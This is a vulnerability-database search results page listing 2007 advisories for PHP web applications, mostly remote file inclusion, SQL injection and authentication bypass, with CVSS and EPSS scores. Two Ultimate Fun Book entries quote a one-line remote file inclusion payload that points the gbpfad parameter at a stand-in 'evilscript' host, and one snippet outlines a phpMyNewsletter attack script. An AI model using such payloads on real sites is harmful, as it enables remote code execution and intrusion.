
647 matches found

securityvulns
added 2007/04/20 12:0 a.m. | 52 views

Gizzar <= (basePath) Remote File Include Vulnerability

Gizzar = basePath Remote File Include Vulnerability Download: http://mesh.dl.sourceforge.net/sourceforge/gizzar/gizzar-03162002.tar.gz Discover: BorN To K!LL Bug in: index.php code:...

0.2 AI score
Exploits: 0

Packet Storm
added 2007/04/19 12:0 a.m. | 20 views

gizzar-rfi.txt

Gizzar = basePath Remote File Include Vulnerability Download: http://mesh.dl.sourceforge.net/sourceforge/gizzar/gizzar-03162002.tar.gz Discover: BorN To K!LL Bug in: index.php code:...

7.4 AI score
Exploits: 0

Prion
added 2007/04/12 1:19 a.m. | 18 views

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in PHPEcho CMS 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) pluginfile parameter to smarty/internals/core.loadpulgins.php or the (2) rootpath parameter to index.php. NOTE: CVE disputes (1) because the inclusion occurs...

7.5 CVSS | 7.9 AI score | 0.01059 EPSS
Exploits: 0 | References: 3 | Affected Software: 1

exploitpack
added 2007/04/05 12:0 a.m. | 7 views

phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities

phpMyNewsletter 0.8 beta5 - Multiple Vulnerabilities !/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc Delete Config Value Rude Attack - can't do anything after 2 - Send an Email to all of the subscribers Do not alter anything Related: 1 - None...

0.2 AI score
Exploits: 0

Prion
added 2007/03/20 10:19 p.m. | 9 views

Code injection

Direct static code injection vulnerability in admin/configuration.php in Guestbara 1.2 and earlier allows remote authenticated users to inject arbitrary PHP code into config.php via the (1) adminmail, (2) emotpatch, (3) login, (4) pass, and unspecified other parameters. NOTE: the provenance of this...

6.8 CVSS | 7.2 AI score | 0.00734 EPSS
Exploits: 0 | References: 2 | Affected Software: 1

Cvelist
added 2007/03/06 1:0 a.m. | 16 views

CVE-2006-7132

Directory traversal vulnerability in pmd-config.php in PHPMyDesk 1.0beta allows remote attackers to include arbitrary local files via the pmdlang parameter to viewticket.php...

6.7 AI score | 0.06378 EPSS
Exploits: 0 | References: 2

NVD
added 2007/03/02 9:18 p.m. | 9 views

CVE-2006-7091

PHP remote file inclusion vulnerability in config.php in phpht Topsites FREE 1.022b allows remote attackers to execute arbitrary PHP code via a URL in the fullpath parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information...

7.5 CVSS | 7.3 AI score | 0.01442 EPSS
Exploits: 1 | References: 1

CVE
added 2007/02/28 12:0 a.m. | 31 views

CVE-2006-7091

CVE-2006-7091 affects phpht Topsites FREE 1.022b. A PHP remote file inclusion vulnerability exists in config.php that lets a remote attacker supply a URL in the fullpath parameter to execute arbitrary PHP code. The vulnerability’s provenance is uncertain, with details derived from third‑party inf...

7.5 CVSS | 7.6 AI score | 0.01442 EPSS
Exploits: 1 | References: 1 | Affected Software: 1

Cvelist
added 2007/02/28 12:0 a.m. | 13 views

CVE-2006-7091

PHP remote file inclusion vulnerability in config.php in phpht Topsites FREE 1.022b allows remote attackers to execute arbitrary PHP code via a URL in the fullpath parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information...

7.3 AI score | 0.01442 EPSS
Exploits: 1 | References: 1

NVD
added 2007/02/23 3:28 a.m. | 10 views

CVE-2006-7025

SQL injection vulnerability in admin/config.php in Bookmark4U 2.0 and 2.1 allows remote attackers to inject arbitrary SQL command via the sqlcmd parameter...

7.5 CVSS | 7.8 AI score | 0.00963 EPSS
Exploits: 1 | References: 6

CVE
added 2007/02/23 1:0 a.m. | 46 views

CVE-2006-7025

CVE-2006-7025 describes an SQL injection in the Bookmark4U app, affecting versions 2.0 and 2.1. The vulnerability is triggered in admin/config.php via the sqlcmd parameter, allowing remote attackers to inject arbitrary SQL. CVSS v2 base score 7.5 (HIGH) indicates potential impact on confidentiali...

7.5 CVSS | 7.8 AI score | 0.00963 EPSS
Exploits: 1 | References: 6 | Affected Software: 1

securityvulns
added 2007/02/23 12:0 a.m. | 60 views

Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability:

Ultimate Fun Book 1.02 found by:kezzap66345 contant= : download script=http://www.ultimate-fun-board.de dork:Ultimate-Fun-Book 1.02 file: function.php code: ?php require$gbpfad."/config.php"; exploit: http://target/path/function.php?gbpfad=http://evilscript thanx= x0r0n,str0ke,shakia milw0rm.com...

0.9 AI score
Exploits: 0

NVD
added 2007/02/21 5:28 p.m. | 11 views

CVE-2007-1043

Ezboo webstats, possibly 3.0.3, allows remote attackers to bypass authentication and gain access via a direct request to (1) update.php and (2) config.php...

7.5 CVSS | 7.2 AI score | 0.06864 EPSS
Exploits: 1 | References: 6

CVE
added 2007/02/21 5:0 p.m. | 47 views

CVE-2007-1043

CVE-2007-1043 concerns Ezboo Webstats (possibly v3.0.3), where an authentication bypass enables remote access via direct requests to 1) update.php and 2) config.php. Multiple sources corroborate a remote, unauthenticated bypass affecting the product, with a CVSS v2 base score of 7.5 (HIGH) and ne...

7.5 CVSS | 7.2 AI score | 0.06864 EPSS
Exploits: 1 | References: 6 | Affected Software: 1

EUVD
added 2007/02/21 5:0 p.m. | 2 views

EUVD-2007-1040

Ezboo webstats, possibly 3.0.3, allows remote attackers to bypass authentication and gain access via a direct request to (1) update.php and (2) config.php...

7.5 CVSS | 7.1 AI score | 0.06864 EPSS
Exploits: 1 | References: 6

0day.today
added 2007/02/20 12:0 a.m. | 33 views

Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications. Ultimate Fun Book 1.02 function.php Remote File Include Vulnerability. Ultimate Fun Book 1.02...

7.1 AI score
Exploits: 0

Exploit DB
added 2007/02/20 12:0 a.m. | 53 views

Ultimate Fun Book 1.02 - 'function.php' Remote File Inclusion

Ultimate Fun Book 1.02 found by:kezzap66345 contant= : download script=http://www.ultimate-fun-board.de dork:Ultimate-Fun-Book 1.02 file: function.php code: ?php require$gbpfad."/config.php"; exploit: http://target/path/function.php?gbpfad=http://evilscript thanx= x0r0n,str0ke,shakia milw0rm.com...

7.4 AI score
Exploits: 0

seebug.org
added 2007/02/11 12:0 a.m. | 23 views

ezConvert: phpBB ezBoard converter v0.2 (ezconvert_dir) Remote File Include Exploit

No description provided by source. C xoron Name: ezConvert: phpBB ezBoard converter v0.2 ezconvertdir Remote File Include Exploit Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=114129 xoron.biz - xoron.info www.xoron.info/bugs/ezconvert.txt...

7.1 AI score
Exploits: 0

NVD
added 2007/02/09 1:28 a.m. | 12 views

CVE-2007-0863

PHP remote file inclusion vulnerability in Trevorchan 0.7 and earlier allows remote attackers to execute arbitrary code via the tcconfigrootdir parameter to (1) upgrade.php, (2) paintsave.php, (3) menu.php, (4) manage.php, and (5) banned.php. NOTE: this issue has been disputed by reliable third parties, who...

10 CVSS | 7.8 AI score | 0.11986 EPSS
Exploits: 0 | References: 3

Prion
added 2007/02/06 2:28 a.m. | 16 views

Remote file inclusion

PHP remote file inclusion vulnerability in config.php in phpBB ezBoard converter ezconvert 0.2 allows remote attackers to execute arbitrary PHP code via a URL in the ezconvertdir parameter...

7.5 CVSS | 8 AI score | 0.03168 EPSS
Exploits: 0 | References: 6 | Affected Software: 1